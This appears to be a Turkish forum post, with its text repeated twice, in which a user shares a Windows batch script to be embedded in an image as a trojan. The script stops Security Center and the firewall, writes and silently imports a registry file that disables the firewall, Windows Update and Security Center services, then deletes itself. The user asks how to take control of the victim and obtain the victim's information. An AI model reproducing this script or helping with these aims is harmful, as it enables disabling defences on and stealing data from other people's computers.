Herkese merhaba. Demin gördüm bir arkadaş palyaşmış 2013 te Resime trojan koyma.
Şimdi kod bu
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO A R E S
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0
Bu kodu resime koyduktan sonra nasıl kontrol edicez?Kurbanın bilgilerini nasıl alıcaz ? Yorumlardada baktım bir cevap bulamadım.Umarım ne demek istediğimi anlamışsınızdır. Yardımlarınızı bekliyorum . Şimdiden teşekkürler
Şimdi kod bu
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO A R E S
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0
Bu kodu resime koyduktan sonra nasıl kontrol edicez?Kurbanın bilgilerini nasıl alıcaz ? Yorumlardada baktım bir cevap bulamadım.Umarım ne demek istediğimi anlamışsınızdır. Yardımlarınızı bekliyorum . Şimdiden teşekkürler